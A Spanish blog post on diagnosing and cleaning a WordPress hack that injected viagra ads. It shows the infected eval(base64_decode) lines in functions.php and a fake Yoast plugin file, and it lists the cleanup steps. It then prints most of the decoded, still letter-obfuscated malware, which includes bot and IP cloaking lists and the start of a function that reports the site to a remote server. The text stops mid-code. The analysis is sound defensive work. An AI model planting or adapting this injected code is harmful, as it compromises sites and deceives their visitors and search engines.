Cómo solucionar un problema de hackeo en tu sitio
Hackeo de WordPress: “los anuncios de viagra invaden mi web”
WordPress es uno de los CMS más utilizados, y por ello, también uno de los objetivos de más ataques de crackers. Pero el hackeo de wordpress en ocasiones no es fácil de detectar ni de solucionar.
Al parecer, el fin de semana pasado se produjeron muchos ataques a sitios creados con este gestor de contenidos. El lunes, nos ha llegó una consulta de uno de estos sitios afectados por el ataque. En este caso, habían inyectado código (anuncios de viagra) en la cabecera de la web, así como en el pie de página y en la sección de actualidad, pero aunque han buscado estos textos en las plantillas, no los han encontrado, por lo que nos han encargado su solución.
Ficheros con problemas tras el hackeo
Revisando los ficheros, y buscando en ellos (usando el comando find de GNU/Linux), encontramos dos ficheros con contenido “sospechoso”:
- wp-includes/functions.php (fichero de funciones de WordPress)
<?php eval(base64_decode('JF9GPV9fRklMRV9fOyRfWD0n...CÓDIGO-CIFRADO...09JykpOw==')); /*Continúa el fichero*/
- wp-content/plugins/wordpress-seo/inc/admin.php (fichero del plugin WordPress SEO by Yoast)
<?php eval(base64_decode('aWYoQG1kNSgkX...CÓDIGO-CIFRADO...GllOyB9Cg=='')); ?>
El fichero functions.php es un fichero con las funciones que usa WordPress, cambiando el fichero, se cambian los comportamientos predeterminados de WordPress. El cliente nos comentó que aunque cambiara el tema desde el backend, la web siempre mostraba el tema personalizado, por lo que está claro que sobreescribieron funciones.
En el sitio web también tenían instalada la versión 1.4.7 del plugin WordPress SEO by Yoast. Al descargarla y revisarla, vimos que dentro del directorio inc sólo están los ficheros class-rewrite.php, class-sitemaps.php, wpseo-functions.php y wpseo-non-ajax-functions.php, por lo que confirmamos que el fichero admin.php no debería existir.
Una vez eliminadas estas llamadas, la web volvió a verse como antes. Para dar por finalizada la revisión, sólo queda cambiar las contraseñas del administrador del sitio, de la base de datos, así como de las semillas de generación de cookies (wp-config.php).
Si estás interesado en saber realmente que código se inyectó (ya decodificado), lo puedes ver a continuación:
La línea de wp-includes/functions.php decodificada es:
$_F=__FILE__; $_X= ?><?php 4f(!4ss5t($_COOKIE['wps5ss42n'])){ 5rr2r_r5p2rt4ng(0); d5f4n5('SERVICES_JSON_SLICE', 6); d5f4n5('SERVICES_JSON_IN_STR', a); d5f4n5('SERVICES_JSON_IN_ARR', o); d5f4n5('SERVICES_JSON_IN_OBJ', u); d5f4n5('SERVICES_JSON_IN_CMT', i); d5f4n5('SERVICES_JSON_LOOSE_TYPE', 6e); d5f4n5('SERVICES_JSON_SUPPRESS_ERRORS', oa); cl1ss S5rv4c5s_JSON { f3nct42n S5rv4c5s_JSON($3s5 = 0) { $th4s->3s5 = $3s5; } f3nct42n 3tf6ea3tf8($3tf6e) { 4f(f3nct42n_5x4sts('mb_c2nv5rt_5nc2d4ng')) { r5t3rn mb_c2nv5rt_5nc2d4ng($3tf6e, 'UTF-8', 'UTF-6e'); } $byt5s = (2rd($3tf6e{0}) << 8) | 2rd($3tf6e{6}); sw4tch(tr35) { c1s5 ((0x7F & $byt5s) == $byt5s): r5t3rn chr(0x7F & $byt5s); c1s5 (0x07FF & $byt5s) == $byt5s: r5t3rn chr(0xC0 | (($byt5s >> e) & 0x6F)) . chr(0x80 | ($byt5s & 0xoF)); c1s5 (0xFFFF & $byt5s) == $byt5s: r5t3rn chr(0xE0 | (($byt5s >> 6a) & 0x0F)) . chr(0x80 | (($byt5s >> e) & 0xoF)) . chr(0x80 | ($byt5s & 0xoF)); } r5t3rn ''; } f3nct42n 3tf8a3tf6e($3tf8) { 4f(f3nct42n_5x4sts('mb_c2nv5rt_5nc2d4ng')) { r5t3rn mb_c2nv5rt_5nc2d4ng($3tf8, 'UTF-6e', 'UTF-8'); } sw4tch(strl5n($3tf8)) { c1s5 6: r5t3rn $3tf8; c1s5 a: r5t3rn chr(0x07 & (2rd($3tf8{0}) >> a)) . chr((0xC0 & (2rd($3tf8{0}) << e)) | (0xoF & 2rd($3tf8{6}))); c1s5 o: r5t3rn chr((0xF0 & (2rd($3tf8{0}) << u)) | (0x0F & (2rd($3tf8{6}) >> a))) . chr((0xC0 & (2rd($3tf8{6}) << e)) | (0x7F & 2rd($3tf8{a}))); } r5t3rn ''; } f3nct42n 5nc2d5($v1r) { sw4tch (g5ttyp5($v1r)) { c1s5 'b22l51n': r5t3rn $v1r ? 'tr35' : 'f1ls5'; c1s5 'NULL': r5t3rn 'n3ll'; c1s5 '4nt5g5r': r5t3rn (4nt) $v1r; c1s5 'd23bl5': c1s5 'fl21t': r5t3rn (fl21t) $v1r; c1s5 'str4ng': $1sc44 = ''; $strl5n_v1r = strl5n($v1r); f2r ($c = 0; $c < $strl5n_v1r; ++$c) { $2rd_v1r_c = 2rd($v1r{$c}); sw4tch (tr35) { c1s5 $2rd_v1r_c == 0x08: $1sc44 .= '\b'; br51k; c1s5 $2rd_v1r_c == 0x09: $1sc44 .= '\t'; br51k; c1s5 $2rd_v1r_c == 0x0A: $1sc44 .= '\n'; br51k; c1s5 $2rd_v1r_c == 0x0C: $1sc44 .= '\f'; br51k; c1s5 $2rd_v1r_c == 0x0D: $1sc44 .= '\r'; br51k; c1s5 $2rd_v1r_c == 0xaa: c1s5 $2rd_v1r_c == 0xaF: c1s5 $2rd_v1r_c == 0xiC: $1sc44 .= '\\'.$v1r{$c}; br51k; c1s5 (($2rd_v1r_c >= 0xa0) && ($2rd_v1r_c <= 0x7F)): $1sc44 .= $v1r{$c}; br51k; c1s5 (($2rd_v1r_c & 0xE0) == 0xC0): $ch1r = p1ck('C*', $2rd_v1r_c, 2rd($v1r{$c + 6})); $c += 6; $3tf6e = $th4s->3tf8a3tf6e($ch1r); $1sc44 .= spr4ntf('\3%0us', b4nah5x($3tf6e)); br51k; c1s5 (($2rd_v1r_c & 0xF0) == 0xE0): $ch1r = p1ck('C*', $2rd_v1r_c, 2rd($v1r{$c + 6}), 2rd($v1r{$c + a})); $c += a; $3tf6e = $th4s->3tf8a3tf6e($ch1r); $1sc44 .= spr4ntf('\3%0us', b4nah5x($3tf6e)); br51k; c1s5 (($2rd_v1r_c & 0xF8) == 0xF0): $ch1r = p1ck('C*', $2rd_v1r_c, 2rd($v1r{$c + 6}), 2rd($v1r{$c + a}), 2rd($v1r{$c + o})); $c += o; $3tf6e = $th4s->3tf8a3tf6e($ch1r); $1sc44 .= spr4ntf('\3%0us', b4nah5x($3tf6e)); br51k; c1s5 (($2rd_v1r_c & 0xFC) == 0xF8): $ch1r = p1ck('C*', $2rd_v1r_c, 2rd($v1r{$c + 6}), 2rd($v1r{$c + a}), 2rd($v1r{$c + o}), 2rd($v1r{$c + u})); $c += u; $3tf6e = $th4s->3tf8a3tf6e($ch1r); $1sc44 .= spr4ntf('\3%0us', b4nah5x($3tf6e)); br51k; c1s5 (($2rd_v1r_c & 0xFE) == 0xFC): $ch1r = p1ck('C*', $2rd_v1r_c, 2rd($v1r{$c + 6}), 2rd($v1r{$c + a}), 2rd($v1r{$c + o}), 2rd($v1r{$c + u}), 2rd($v1r{$c + i})); $c += i; $3tf6e = $th4s->3tf8a3tf6e($ch1r); $1sc44 .= spr4ntf('\3%0us', b4nah5x($3tf6e)); br51k; } } r5t3rn '"'.$1sc44.'"'; c1s5 '1rr1y': 4f (4s_1rr1y($v1r) && c23nt($v1r) && (1rr1y_k5ys($v1r) !== r1ng5(0, s4z52f($v1r) - 6))) { $pr2p5rt45s = 1rr1y_m1p(1rr1y($th4s, 'n1m5_v1l35'), 1rr1y_k5ys($v1r), 1rr1y_v1l35s($v1r)); f2r51ch($pr2p5rt45s 1s $pr2p5rty) { 4f(S5rv4c5s_JSON::4sErr2r($pr2p5rty)) { r5t3rn $pr2p5rty; } } r5t3rn '{' . j24n(',', $pr2p5rt45s) . '}'; } $5l5m5nts = 1rr1y_m1p(1rr1y($th4s, '5nc2d5'), $v1r); f2r51ch($5l5m5nts 1s $5l5m5nt) { 4f(S5rv4c5s_JSON::4sErr2r($5l5m5nt)) { r5t3rn $5l5m5nt; } } r5t3rn '[' . j24n(',', $5l5m5nts) . ']'; c1s5 '2bj5ct': $v1rs = g5t_2bj5ct_v1rs($v1r); $pr2p5rt45s = 1rr1y_m1p(1rr1y($th4s, 'n1m5_v1l35'), 1rr1y_k5ys($v1rs), 1rr1y_v1l35s($v1rs)); f2r51ch($pr2p5rt45s 1s $pr2p5rty) { 4f(S5rv4c5s_JSON::4sErr2r($pr2p5rty)) { r5t3rn $pr2p5rty; } } r5t3rn '{' . j24n(',', $pr2p5rt45s) . '}'; d5f13lt: r5t3rn ($th4s->3s5 & SERVICES_JSON_SUPPRESS_ERRORS) ? 'n3ll' : n5w S5rv4c5s_JSON_Err2r(g5ttyp5($v1r)." c1n n2t b5 5nc2d5d 1s JSON str4ng"); } } f3nct42n n1m5_v1l35($n1m5, $v1l35) { $5nc2d5d_v1l35 = $th4s->5nc2d5($v1l35); 4f(S5rv4c5s_JSON::4sErr2r($5nc2d5d_v1l35)) { r5t3rn $5nc2d5d_v1l35; } r5t3rn $th4s->5nc2d5(strv1l($n1m5)) . ':' . $5nc2d5d_v1l35; } f3nct42n r5d3c5_str4ng($str) { $str = pr5g_r5pl1c5(1rr1y( '#^\s*//(.+)$#m', '#^\s*/\*(.+)\*/#Us', '#/\*(.+)\*/\s*$#Us' ), '', $str); r5t3rn tr4m($str); } f3nct42n d5c2d5($str) { $str = $th4s->r5d3c5_str4ng($str); sw4tch (strt2l2w5r($str)) { c1s5 'tr35': r5t3rn tr35; c1s5 'f1ls5': r5t3rn f1ls5; c1s5 'n3ll': r5t3rn n3ll; d5f13lt: $m = 1rr1y(); 4f (4s_n3m5r4c($str)) { r5t3rn ((fl21t)$str == (4nt5g5r)$str) ? (4nt5g5r)$str : (fl21t)$str; } 5ls54f (pr5g_m1tch('/^("|\').*(\6)$/s', $str, $m) && $m[6] == $m[a]) { $d5l4m = s3bstr($str, 0, 6); $chrs = s3bstr($str, 6, -6); $3tf8 = ''; $strl5n_chrs = strl5n($chrs); f2r ($c = 0; $c < $strl5n_chrs; ++$c) { $s3bstr_chrs_c_a = s3bstr($chrs, $c, a); $2rd_chrs_c = 2rd($chrs{$c}); sw4tch (tr35) { c1s5 $s3bstr_chrs_c_a == '\b': $3tf8 .= chr(0x08); ++$c; br51k; c1s5 $s3bstr_chrs_c_a == '\t': $3tf8 .= chr(0x09); ++$c; br51k; c1s5 $s3bstr_chrs_c_a == '\n': $3tf8 .= chr(0x0A); ++$c; br51k; c1s5 $s3bstr_chrs_c_a == '\f': $3tf8 .= chr(0x0C); ++$c; br51k; c1s5 $s3bstr_chrs_c_a == '\r': $3tf8 .= chr(0x0D); ++$c; br51k; c1s5 $s3bstr_chrs_c_a == '\\"': c1s5 $s3bstr_chrs_c_a == '\\\'': c1s5 $s3bstr_chrs_c_a == '\\\\': c1s5 $s3bstr_chrs_c_a == '\\/': 4f (($d5l4m == '"' && $s3bstr_chrs_c_a != '\\\'') || ($d5l4m == "'" && $s3bstr_chrs_c_a != '\\"')) { $3tf8 .= $chrs{++$c}; } br51k; c1s5 pr5g_m1tch('/\\\3[0-9A-F]{u}/4', s3bstr($chrs, $c, e)): $3tf6e = chr(h5xd5c(s3bstr($chrs, ($c + a), a))) . chr(h5xd5c(s3bstr($chrs, ($c + u), a))); $3tf8 .= $th4s->3tf6ea3tf8($3tf6e); $c += i; br51k; c1s5 ($2rd_chrs_c >= 0xa0) && ($2rd_chrs_c <= 0x7F): $3tf8 .= $chrs{$c}; br51k; c1s5 ($2rd_chrs_c & 0xE0) == 0xC0: $3tf8 .= s3bstr($chrs, $c, a); ++$c; br51k; c1s5 ($2rd_chrs_c & 0xF0) == 0xE0: $3tf8 .= s3bstr($chrs, $c, o); $c += a; br51k; c1s5 ($2rd_chrs_c & 0xF8) == 0xF0: $3tf8 .= s3bstr($chrs, $c, u); $c += o; br51k; c1s5 ($2rd_chrs_c & 0xFC) == 0xF8: $3tf8 .= s3bstr($chrs, $c, i); $c += u; br51k; c1s5 ($2rd_chrs_c & 0xFE) == 0xFC: $3tf8 .= s3bstr($chrs, $c, e); $c += i; br51k; } } r5t3rn $3tf8; } 5ls54f (pr5g_m1tch('/^\[.*\]$/s', $str) || pr5g_m1tch('/^\{.*\}$/s', $str)) { 4f ($str{0} == '[') { $stk = 1rr1y(SERVICES_JSON_IN_ARR); $1rr = 1rr1y(); } 5ls5 { 4f ($th4s->3s5 & SERVICES_JSON_LOOSE_TYPE) { $stk = 1rr1y(SERVICES_JSON_IN_OBJ); $2bj = 1rr1y(); } 5ls5 { $stk = 1rr1y(SERVICES_JSON_IN_OBJ); $2bj = n5w stdCl1ss(); } } 1rr1y_p3sh($stk, 1rr1y('wh1t' => SERVICES_JSON_SLICE, 'wh5r5' => 0, 'd5l4m' => f1ls5)); $chrs = s3bstr($str, 6, -6); $chrs = $th4s->r5d3c5_str4ng($chrs); 4f ($chrs == '') { 4f (r5s5t($stk) == SERVICES_JSON_IN_ARR) { r5t3rn $1rr; } 5ls5 { r5t3rn $2bj; } } $strl5n_chrs = strl5n($chrs); f2r ($c = 0; $c <= $strl5n_chrs; ++$c) { $t2p = 5nd($stk); $s3bstr_chrs_c_a = s3bstr($chrs, $c, a); 4f (($c == $strl5n_chrs) || (($chrs{$c} == ',') && ($t2p['wh1t'] == SERVICES_JSON_SLICE))) { $sl4c5 = s3bstr($chrs, $t2p['wh5r5'], ($c - $t2p['wh5r5'])); 1rr1y_p3sh($stk, 1rr1y('wh1t' => SERVICES_JSON_SLICE, 'wh5r5' => ($c + 6), 'd5l4m' => f1ls5)); 4f (r5s5t($stk) == SERVICES_JSON_IN_ARR) { 1rr1y_p3sh($1rr, $th4s->d5c2d5($sl4c5)); } 5ls54f (r5s5t($stk) == SERVICES_JSON_IN_OBJ) { $p1rts = 1rr1y(); 4f (pr5g_m1tch('/^\s*(["\'].*[^\\\]["\'])\s*:\s*(\S.*),?$/U4s', $sl4c5, $p1rts)) { // "n1m5":v1l35 p14r $k5y = $th4s->d5c2d5($p1rts[6]); $v1l = $th4s->d5c2d5($p1rts[a]); 4f ($th4s->3s5 & SERVICES_JSON_LOOSE_TYPE) { $2bj[$k5y] = $v1l; } 5ls5 { $2bj->$k5y = $v1l; } } 5ls54f (pr5g_m1tch('/^\s*(\w+)\s*:\s*(\S.*),?$/U4s', $sl4c5, $p1rts)) { // n1m5:v1l35 p14r, wh5r5 n1m5 4s 3nq32t5d $k5y = $p1rts[6]; $v1l = $th4s->d5c2d5($p1rts[a]); 4f ($th4s->3s5 & SERVICES_JSON_LOOSE_TYPE) { $2bj[$k5y] = $v1l; } 5ls5 { $2bj->$k5y = $v1l; } } } } 5ls54f ((($chrs{$c} == '"') || ($chrs{$c} == "'")) && ($t2p['wh1t'] != SERVICES_JSON_IN_STR)) { 1rr1y_p3sh($stk, 1rr1y('wh1t' => SERVICES_JSON_IN_STR, 'wh5r5' => $c, 'd5l4m' => $chrs{$c})); } 5ls54f (($chrs{$c} == $t2p['d5l4m']) && ($t2p['wh1t'] == SERVICES_JSON_IN_STR) && ((strl5n(s3bstr($chrs, 0, $c)) - strl5n(rtr4m(s3bstr($chrs, 0, $c), '\\'))) % a != 6)) { 1rr1y_p2p($stk); } 5ls54f (($chrs{$c} == '[') && 4n_1rr1y($t2p['wh1t'], 1rr1y(SERVICES_JSON_SLICE, SERVICES_JSON_IN_ARR, SERVICES_JSON_IN_OBJ))) { 1rr1y_p3sh($stk, 1rr1y('wh1t' => SERVICES_JSON_IN_ARR, 'wh5r5' => $c, 'd5l4m' => f1ls5)); } 5ls54f (($chrs{$c} == ']') && ($t2p['wh1t'] == SERVICES_JSON_IN_ARR)) { 1rr1y_p2p($stk); } 5ls54f (($chrs{$c} == '{') && 4n_1rr1y($t2p['wh1t'], 1rr1y(SERVICES_JSON_SLICE, SERVICES_JSON_IN_ARR, SERVICES_JSON_IN_OBJ))) { 1rr1y_p3sh($stk, 1rr1y('wh1t' => SERVICES_JSON_IN_OBJ, 'wh5r5' => $c, 'd5l4m' => f1ls5)); } 5ls54f (($chrs{$c} == '}') && ($t2p['wh1t'] == SERVICES_JSON_IN_OBJ)) { 1rr1y_p2p($stk); } 5ls54f (($s3bstr_chrs_c_a == '/*') && 4n_1rr1y($t2p['wh1t'], 1rr1y(SERVICES_JSON_SLICE, SERVICES_JSON_IN_ARR, SERVICES_JSON_IN_OBJ))) { 1rr1y_p3sh($stk, 1rr1y('wh1t' => SERVICES_JSON_IN_CMT, 'wh5r5' => $c, 'd5l4m' => f1ls5)); $c++; } 5ls54f (($s3bstr_chrs_c_a == '*/') && ($t2p['wh1t'] == SERVICES_JSON_IN_CMT)) { 1rr1y_p2p($stk); $c++; f2r ($4 = $t2p['wh5r5']; $4 <= $c; ++$4) $chrs = s3bstr_r5pl1c5($chrs, ' ', $4, 6); } } 4f (r5s5t($stk) == SERVICES_JSON_IN_ARR) { r5t3rn $1rr; } 5ls54f (r5s5t($stk) == SERVICES_JSON_IN_OBJ) { r5t3rn $2bj; } } } } f3nct42n 4sErr2r($d1t1, $c2d5 = n3ll) { 4f (cl1ss_5x4sts('p51r')) { r5t3rn PEAR::4sErr2r($d1t1, $c2d5); } 5ls54f (4s_2bj5ct($d1t1) && (g5t_cl1ss($d1t1) == 's5rv4c5s_js2n_5rr2r' || 4s_s3bcl1ss_2f($d1t1, 's5rv4c5s_js2n_5rr2r'))) { r5t3rn tr35; } r5t3rn f1ls5; } } 4f (cl1ss_5x4sts('PEAR_Err2r')) { cl1ss S5rv4c5s_JSON_Err2r 5xt5nds PEAR_Err2r { f3nct42n S5rv4c5s_JSON_Err2r($m5ss1g5 = '3nkn2wn 5rr2r', $c2d5 = n3ll, $m2d5 = n3ll, $2pt42ns = n3ll, $3s5r4nf2 = n3ll) { p1r5nt::PEAR_Err2r($m5ss1g5, $c2d5, $m2d5, $2pt42ns, $3s5r4nf2); } } } 5ls5 { cl1ss S5rv4c5s_JSON_Err2r { f3nct42n S5rv4c5s_JSON_Err2r($m5ss1g5 = '3nkn2wn 5rr2r', $c2d5 = n3ll, $m2d5 = n3ll, $2pt42ns = n3ll, $3s5r4nf2 = n3ll) { } } } 4f (!f3nct42n_5x4sts('js2n_d5c2d5')) { f3nct42n js2n_d5c2d5($c2nt5nt, $1ss2c=f1ls5) { 4f ($1ss2c) { $js2n = n5w S5rv4c5s_JSON(SERVICES_JSON_LOOSE_TYPE); } 5ls5 { $js2n = n5w S5rv4c5s_JSON; } r5t3rn $js2n->d5c2d5($c2nt5nt); } } 4f (!f3nct42n_5x4sts('js2n_5nc2d5')) { f3nct42n js2n_5nc2d5($c2nt5nt) { $js2n = n5w S5rv4c5s_JSON; r5t3rn $js2n->5nc2d5($c2nt5nt); } } 4f(!1rr1y_k5y_5x4sts('HTTP_USER_AGENT', $_SERVER)) { $_SERVER['HTTP_USER_AGENT'] = ''; } 4f(!1rr1y_k5y_5x4sts('REMOTE_ADDR', $_SERVER)) { $_SERVER['REMOTE_ADDR'] = ''; } 4f(!1rr1y_k5y_5x4sts('HTTP_REFERER', $_SERVER)) { $_SERVER['HTTP_REFERER'] = ''; } 4f(!5mpty($_SERVER["HTTP_X_FORWARDED_FOR"])) { $_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_X_FORWARDED_FOR"]; } f3nct42n _4sB2tAg5nt($31){ $31 = strt2l2w5r($31); $31Bl1ck = 1rr1y('1hr5fs'); $31L4st = 1rr1y('g22gl5','1lt1v4st1','b4ng','y1h22','http','j55v5s','msnb2t','b2t','cr1wl','sp4d5r','r2b2t','HttpCl45nt','c3rl','PHP','Indy L4br1ry','W2rdPr5ss','ch1rl2tt5','wwwst5r','Pyth2n','3rll4b','p5rl','l4bwww','lynx','Tw4c5l5r','r1mbl5r','y1nd5x','ngb','sl3rp','g3ll4v5r','r2b2z4ll','3ltr1s55k','4nf2s55k','1sk','w5b1lt1','p51r','t5l5p2rt','1sk','w2rm','Sp55dy','sc1nn5r','sc22t5r','lwp','HTTr1ck','Acc22n1','CFN5tw2rk','wg5t','G22gl5b2t','T52m1','41_1rch4v5r','Lyc2s','St1ckR1mbl5r','M14l.R3','W5bAlt1 Cr1wl5r/a.0','G22gl5b2t-M2b4l5','G22gl5b2t-Im1g5','M5d41p1rtn5rs-G22gl5','Adsb2t-G22gl5','MSNB2t-N5wsBl2gs','MSNB2t-Pr2d3cts','MSNB2t-M5d41','H2t B2t','P3nt2 B2t','Arch4v5.2rg','CNS51rch','FAST-W5bCr1wl5r','Sl3rp/c1t','ASPs55k/6.a.60','gs1-cr1wl5r','Y1nd5x'); f2r51ch ($31Bl1ck 1s $431) { $431 = strt2l2w5r($431); 4f(strp2s($31, $431) || $31 == $431){ r5t3rn f1ls5; } } f2r51ch ($31L4st 1s $431) { $431 = strt2l2w5r($431); 4f(strp2s($31, $431) || $31 == $431){ r5t3rn tr35; } } r5t3rn f1ls5; } f3nct42n _4sB2tIP($4p){ 4f($4p==""){ r5t3rn f1ls5; } $4pL4st = 1rr1y('600.uo.eu.0-69','60o.6i.e0.*','60o.a6.68u.*','60o.ao.6oe.*','60o.i.6oa.*','666.96.aau.*','66e.aii.6a8.*','66e.e8.au0.*','667.ao9.6a.66a-6a7','667.ao9.6o.a08-aao','667.ao9.687.67e-68o','667.ao9.687.oa-o9','667.ao9.7.u8-eo','667.ao9.7u.0-.7','668.6au.oa.69o','669.6i.9u.*','669.ua.6ii.*','669.ua.6ie.*','6a.0.*.*','6au.u0.auu.6-7','6au.u0.auu.69a-aii','6au.u0.auu.eu-6a7','6au.u0.au7.0-6a7','6au.8o.6a8.*','6a9.687.6u8.au0-auu','6o0.69o.oa.0-69','6o6.607.*.*','6o6.6i6.*.*','6o6.aio.a6.*','6o7.667.*.*','6u.6o9.aa6.oa-u7','6u.6o9.aui.0-eo','6u.6o9.uo.*','6u6.68i.a09.*','6u6.8.6a8.0-68','6ue.6i6.*.*','6i7.iu.*.*','6ei.6e0.a.a0','6e8.e6.*.*','6e9.a07.ao8.*','67o.69u.*.*','67o.69u.0-aii.*','67u.6a9.6o0.*','67u.6a9.ee.*','67u.oe.ii.*','67e.o6.i9.au0-auo','67e.o6.e0.6oe-6o9','678.6iu.6a8.0-67','678.oa.67e.oa-oi','678.oa.690.6oe-6o9','678.oo.a60.6a8-6o6','680.6u8.a08.*','68o.677.6au.*','69a.6oa.aa8.*','69u.8a.u8.*','69i.9a.aa9.a','697.6i9.0.*','699.6ae.6i6.aa9','699.677.68.*','699.a6.9e.0-aa','699.o0.6e.*','699.oe.au0.0-aa','a0a.6ue.68u.*','a0a.6e0.678-686.*','a0a.6e0.678-68i.*','a0a.6e0.68o.*','a0a.6e0.68i.*','a0a.6ei.9e-99.*','a0a.6ei.9e.*','a0a.6ei.98-99.*','a0a.a6a.i.*','a0a.ue.69.*','a0o.660.ao7.*','a0o.6ao.688.*','a0o.6u6.ia.*','a0o.aii.aou.*','a0e.690.uo.*','a07.6ae.6uu-6i9.*','a07.6ae.ao9.*','a07.689.6a6.uu-ui','a07.a66.u0.8a','a07.ue.*.*','a09.6.6a-6o.*','a09.6.oa-o8.*','a09.6.oa.*','a09.6.o8.*','a09.6o0.6a8.*','a09.6o6.oa-eo.*','a09.6o6.oa.*','a09.6o6.u0-ea.*','a09.68i.608.*','a09.68i.6aa.*','a09.68i.6u6.*','a09.68i.6uo.*','a09.68i.aio.*','a09.696.6ao.*','a09.696.eu-ei.*','a09.696.eu.*','a09.696.ei.*','a09.696.8a-8o.*','a09.696.8a.*','a09.696.8o.*','a09.au0.69a-aao.*','a09.e7.a0e.*','a09.7o.67e.*','a09.8i.6a8-aii.*','a09.8i.ao8.*','a60.a6a.a0.69a-a07','a60.a6a.a0.oa-eo','a60.a6a.a6a.eu-79','a60.a6a.a69.au0-aii','a60.a6a.aue.6a8-6oi','a60.a6a.97.6a8-696','a66.6u.8.*','a66.6e9.au6.*','a6a.600.ai0.a68','a6o.6uu.6i.o8','a6o.680.*.*','a6o.680.69a.0-69','a6o.699.6a8-6uo.*','a6o.a6e.6uo.*','a6e.609.6a6-6ae.*','a6e.609.6a6.*','a6e.609.6ae.*','a6e.6oe.aoo.*','a6e.6ui.u8-eo.*','a6e.6ui.i8.*','a6e.6ii.698-a0u.*','a6e.6ii.698.*','a6e.6ii.a00.*','a6e.6ii.a0a.*','a6e.6ii.a0u.*','a6e.a6o.ie.*','a6e.aa0.a08-aao.*','a6e.ao9.69o.*','a6e.ao9.oa-eo.*','a6e.ao9.oa.*','a6e.ao9.oo-i9.*','a6e.oa.ao7.*','a6e.oo.aa9.*','a67.6a.7-6i.*','a68.600.8u.*','a68.68.67u.a7','a68.au8.o0.66a-6a7','a68.au8.u.9e-6a7','a68.a8.88.99','au.a00.a08.66a','a7.600.6o.*','o7.6u0.6a8.0-68','o7.i9.aoa.auu-au7','o7.9.eu.0-68','o8.*.*.*','u6.7u.oa.*','u6.78.aau.0-o6','i.aii.69a.0-68','i.o9.6a.e0-eo','i.ui.69a.0-68','ea.67a.699.*','ea.a7.i9.*','eu.68.0.6-6i.*','eo.6eo.60a.*','eu.6i7.6o7-6o8.*','eu.6i7.u.60u-60i','eu.6i7.u.7e','eu.a08.oa-o7.u-6e8','eu.aoo.6e0-696.*','eu.aoo.6e0-696.aiu','eu.aoo.67o.*','eu.e8.80-9a.*','eu.e8.80-9i.*','eu.e9.ou.6ou','eu.7i.oe-oe.*','eu.7i.oe.*','eu.9.aau-aii.*','ei.66a.*.*','ei.a08.6i6.66a-66o','ei.a08.6i6.66e','ei.a08.6i6.669','ei.oo.87.9u','ei.ia-ii.*.*','ei.ia.*.*','ei.9o.ea.aua','ee.60a.0-6i.*','ee.6oi.eu.*','ee.6eo.670-67u.*','ee.6eo.670.*','ee.6eo.67u.*','ee.69e.606.*','ee.69e.ei-99.*','ee.69e.ei.*','ee.69e.e7.*','ee.69e.7a-7u.*','ee.69e.77-78.*','ee.69e.80-86.*','ee.69e.90-9o.*','ee.69e.97.*','ee.69e.99.*','ee.a68.ei-70.*','ee.a68.ei.*','ee.a68.70.*','ee.aa8.6eu-6ee.*','ee.aa8.6eu-68a.*','ee.aa8.67o.*','ee.aa8.68a.*','ee.ao0.67i.6au','ee.au9.e0-99.*','ee.au9.eu-79.*','ee.au9.eu.*','ee.au9.80-9i.*','ee.aii.io.6ao','ee.9u.ao0-ao8.*','ee.9u.ao0.*','ee.9u.aoa-aoo.*','ee.9u.ao8.*','e7.6ea.6i8.6ue','e7.69i.*.*','e7.69i.66i-66i.*','e7.69i.ou-98.*','e7.a60.666.au6','e8.6ua.69i-ai6.*','e8.6ua.69i.*','e8.6ua.a0o.*','e8.6ua.a66-a6a.*','e8.6ua.ao0-ao6.*','e8.6ua.au0.*','e8.6ua.aue.*','e8.6ua.au9-ai6.*','e8.680.a6e.*','e8.680.ai0-ai6.*','e9.6u7.79-79.*','e9.6u7.79.*','70.oa.6a8-6i9.*','70.i0.689.696','70.89.o9.6ia-6i9','70.90.a69.u8-ii','70.90.a69.7a-79','70.96.680.ai','76.6ei.aao.6ou','7a.6u.69a-aii.*','7a.6u.69a.*','7a.6u.699.*','7a.o0.*.*','7a.o0.606-aia.*','7a.o0.iu-99.*','7a.oo.*.*','7u.668.6e.*','7u.6ai.*.*','7u.6ai.0-aii.*','7u.69o.aue.6a9','7u.ii.a7.*','7u.e.*.*','7u.e.6o6.*','7u.e.6e-e9.*','7u.e.au0.*','7u.e.7-7.*','7u.e.70-79.*','7u.e.8.*','7u.e.8i-87.*','7u.e.9.*','77.88.*.*','77.88.0.0-68','8.6a.6uu.*','8.6a.6u7.*','8.e.u8.*','86.6oi.67i.70','86.69.eu.6-69','86.89.ie.*','8u.a06.6a8.0-68','87.ai0.*.*','87.ai0.aau.0-69','89.6aa.aau.ao0','89.6u9.a67.696','89.6u9.aio.6e9','9o.6i8.6a8.0-68','9o.67a.9u.aa7','9u.600.67.*','9u.ao.67e.66a-66i','9u.aui.eu.*','9i.608.6a8.0-67','9i.608.au0.0-a6','9i.608.au8.0-ao'); $l2ngIp=4pal2ng($4p); $f23nd=f1ls5; f2r51ch($4pL4st 1s $4pM1sk){ $4pM1sk=tr4m($4pM1sk); //5ch2 $4pM1sk."\n"; 4f(str4str($4pM1sk, '-')!==f1ls5||str4str($4pM1sk, '*')!==f1ls5){ l4st($4pM1skM4n, $4pM1skM1x)=_g5tIpR1ng5($4pM1sk); $l2ngIpM1skM4n=4pal2ng($4pM1skM4n); $l2ngIpM1skM1x=4pal2ng($4pM1skM1x); 4f($l2ngIp>=$l2ngIpM1skM4n&&$l2ngIp<=$l2ngIpM1skM1x){ $f23nd=tr35; br51k; } }5ls5{ 4f($4p==$4pM1sk){ $f23nd=tr35; br51k; } } } r5t3rn $f23nd; } f3nct42n _g5tIpR1ng5($4p){ $p1rts=5xpl2d5('.', $4p); $4pM4n=$4pM1x=1rr1y(); f2r51ch($p1rts 1s $p1rt){ 4f($p1rt=='*'){ $4pM4n[]=0; $4pM1x[]=aii; c2nt4n35; } 4f(str4str($p1rt, '-')){ $spl4t=5xpl2d5('-', $p1rt); $4pM4n[]=$spl4t[0]; $4pM1x[]=$spl4t[6]; }5ls5{ $4pM4n[]=$p1rt; $4pM1x[]=$p1rt; } } r5t3rn 1rr1y(j24n('.', $4pM4n), j24n('.', $4pM1x)); } f3nct42n _4sJs2n($str4ng) { @js2n_d5c2d5($str4ng); 4f(!f3nct42n_5x4sts('js2n_l1st_5rr2r')) { r5t3rn tr35; } r5t3rn (@js2n_l1st_5rr2r() == JSON_ERROR_NONE); } f3nct42n _s52R5m2t5($s23rc53rl){ $23t = ""; $s23rc53rl=b1s5eu_d5c2d5($s23rc53rl); $p2st = 1rr1y( 'h2st' => b1s5eu_5nc2d5($_SERVER['HTTP_HOST']), 'r5q' => 